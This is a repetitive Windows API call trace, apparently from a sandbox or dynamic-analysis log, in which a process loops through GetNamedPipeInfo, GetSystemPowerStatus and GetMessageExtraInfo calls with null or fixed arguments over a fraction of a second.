	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.088] GetMessageExtraInfo () returned 0x0
	[0130.088] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.088] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.089] GetMessageExtraInfo () returned 0x0
	[0130.089] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.089] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.089] GetMessageExtraInfo () returned 0x0
	[0130.089] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.093] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.093] GetMessageExtraInfo () returned 0x0
	[0130.094] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.094] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.094] GetMessageExtraInfo () returned 0x0
	[0130.094] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.094] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.094] GetMessageExtraInfo () returned 0x0
	[0130.096] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.096] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.096] GetMessageExtraInfo () returned 0x0
	[0130.096] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.096] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.096] GetMessageExtraInfo () returned 0x0
	[0130.097] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.097] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.097] GetMessageExtraInfo () returned 0x0
	[0130.098] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.098] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.098] GetMessageExtraInfo () returned 0x0
	[0130.101] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.101] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.101] GetMessageExtraInfo () returned 0x0
	[0130.103] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.103] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.103] GetMessageExtraInfo () returned 0x0
	[0130.103] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.103] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.103] GetMessageExtraInfo () returned 0x0
	[0130.104] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.104] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.104] GetMessageExtraInfo () returned 0x0
	[0130.104] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.104] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.104] GetMessageExtraInfo () returned 0x0
	[0130.105] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.105] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.105] GetMessageExtraInfo () returned 0x0
	[0130.106] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.106] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.106] GetMessageExtraInfo () returned 0x0
	[0130.106] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.106] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.106] GetMessageExtraInfo () returned 0x0
	[0130.107] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.107] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.107] GetMessageExtraInfo () returned 0x0
	[0130.107] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.107] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.107] GetMessageExtraInfo () returned 0x0
	[0130.108] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.108] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.108] GetMessageExtraInfo () returned 0x0
	[0130.108] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.108] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.108] GetMessageExtraInfo () returned 0x0
	[0130.109] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.109] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.109] GetMessageExtraInfo () returned 0x0
	[0130.111] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.111] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.111] GetMessageExtraInfo () returned 0x0
	[0130.111] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.111] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.111] GetMessageExtraInfo () returned 0x0
	[0130.121] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.121] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.121] GetMessageExtraInfo () returned 0x0
	[0130.121] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.121] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.121] GetMessageExtraInfo () returned 0x0
	[0130.122] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.122] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.122] GetMessageExtraInfo () returned 0x0
	[0130.122] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.122] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.122] GetMessageExtraInfo () returned 0x0
	[0130.123] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.123] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.123] GetMessageExtraInfo () returned 0x0
	[0130.123] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.123] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.123] GetMessageExtraInfo () returned 0x0
	[0130.124] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.124] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.124] GetMessageExtraInfo () returned 0x0
	[0130.126] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.126] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.126] GetMessageExtraInfo () returned 0x0
	[0130.127] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.127] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.127] GetMessageExtraInfo () returned 0x0
	[0130.127] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.127] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.127] GetMessageExtraInfo () returned 0x0
	[0130.128] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.128] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.128] GetMessageExtraInfo () returned 0x0
	[0130.128] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.128] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.128] GetMessageExtraInfo () returned 0x0
	[0130.129] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.129] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.129] GetMessageExtraInfo () returned 0x0
	[0130.132] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.132] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.132] GetMessageExtraInfo () returned 0x0
	[0130.133] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.133] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.133] GetMessageExtraInfo () returned 0x0
	[0130.134] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.134] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.134] GetMessageExtraInfo () returned 0x0
	[0130.134] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.134] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.134] GetMessageExtraInfo () returned 0x0
	[0130.136] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.136] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.136] GetMessageExtraInfo () returned 0x0
	[0130.137] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.137] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.137] GetMessageExtraInfo () returned 0x0
	[0130.138] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.138] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.138] GetMessageExtraInfo () returned 0x0
	[0130.138] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.138] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.138] GetMessageExtraInfo () returned 0x0
	[0130.139] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.139] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.139] GetMessageExtraInfo () returned 0x0
	[0130.139] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.139] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.140] GetMessageExtraInfo () returned 0x0
	[0130.140] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.140] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.140] GetMessageExtraInfo () returned 0x0
